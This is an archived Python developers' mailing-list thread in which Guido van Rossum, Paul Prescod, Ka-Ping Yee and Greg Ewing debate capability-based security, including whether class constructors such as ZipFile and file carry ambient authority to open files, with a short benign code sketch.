What do you mean exactly by "exercise authority"? Again, I understand this for C code, but it would seem that all authority ultimately comes from C code, so I don't understand what authority __init__() can exercise.
To pick one at random, consider zipfile.ZipFile. At first glance it appears that once you create a ZipFile object with mode "r" you can hand it off to provide read-only access to a zip archive. (Even if a security audit of the code reveals holes, my point is that the API isn't far from accommodating such a design intent.)
But is it really ZipFile.__init__ that exercises the authority? Isn't its authority derived from that of the open() function that it calls?
It's useful to be able to separate the authority to read one particular instance of ZipFile from the authority to instantiate new ZipFiles, which currently allows you to open any zip file on the filesystem for reading or writing.
In what sense is the ZipFile class an entity by itself, rather than just a pile of Python statements that derive any and all authority from its caller? I understand how class ZipFile could exercise authority in a rexec-based world, if the zipfile module was trusted code. But I thought that a capability view of the world doesn't distinguish between trusted and untrusted code. I guess I need to understand better what kind of "barriers" the capability way of life *does* use. --Guido van Rossum (home page: http://www.python.org/~guido/)
Guido van Rossum wrote:
...
In many classes, __init__ exercises authority. An obvious C type with the same problem is the "file" type (being able to ask a file object for its type gets you the ability to open any file on the filesystem). But many Python classes are in the same position -- they acquire authority upon initialization.
What do you mean exactly by "exercise authority"? Again, I understand this for C code, but it would seem that all authority ultimately comes from C code, so I don't understand what authority __init__() can exercise.
Given that ZipFile("/tmp/foo.zip") can read a zipfile, the zipfile class clearly has the ability to open files. It derives this ability from the fact that it can get at open(), os.open etc. In a capabilities world, it should not have access to that stuff unless the caller specifically gave it access. And the logical way for the caller to give it that access is like this:

    ZipFile(already_opened_file)

But in restricted code
... But is it really ZipFile.__init__ that exercises the authority? Isn't its authority derived from that of the open() function that it calls?
I think that's the problem. the ZipFile module has a back-door "capability" that is incredibly powerful. In a library designed for capabilities, its only access to the outside world would be via data passed to it explicitly.
In what sense is the ZipFile class an entity by itself, rather than just a pile of Python statements that derive any and all authority from its caller?
In the sense that it can import "open" or "os.open" rather than being forced to only communicate with the world through objects provided by the caller. If we imagine a world where it has no access to those back-doors then I can't see why Ping's complaint about access to classes would be a problem. Paul Prescod
Ka-Ping Yee <ping@zesty.ca>:
On Sun, 30 Mar 2003, Guido van Rossum wrote:
[Ping]
Having access to a particular instance should certainly not allow one to ask it for its class, and then instantiate the class with arbitrary constructor arguments.
Assuming the Python code in the class itself is not empowered in any special way, I don't see why not. So that suggests that you assume classes can be empowered. I can see this for classes implemented in C; but how can classes implemented in pure Python be empowered?
In many classes, __init__ exercises authority. An obvious C type with the same problem is the "file" type
Yes, I think the solution to this is not to forbid getting hold of the class of an object, but to design constructors so that they don't do anything that might be a security problem. In the case of files, that would mean removing the feature that file("foo") means the same as open("foo"), so that only the open() function can open arbitrary files.

Greg Ewing
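Greg's fix, a constructor that exercises no authority of its own, can be sketched as a file-like type that only wraps a stream the caller already holds. The class name and API are invented; the point is that type(instance) then recovers nothing dangerous, because the class cannot reach the filesystem by itself.

```python
import io

class SafeReader:
    """Hypothetical file-like type: __init__ holds no ambient authority.
    It can only wrap an already-open stream handed in by the caller, so
    recovering the class from an instance grants no new power."""

    def __init__(self, stream):
        self._stream = stream

    def read(self, n=-1):
        return self._stream.read(n)

# Only code that separately holds an `open` capability reaches the
# filesystem; this instance grants access to just this one buffer.
r = SafeReader(io.StringIO("data"))
print(r.read())
```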
participants (12)
- Aahz
- Anthony Baxter
- Ben Laurie
- Greg Ewing
- Guido van Rossum
- Jeremy Hylton
- Jeremy Hylton
- Jim Fulton
- Jim Fulton
- Ka-Ping Yee
- Paul Prescod
- Samuele Pedroni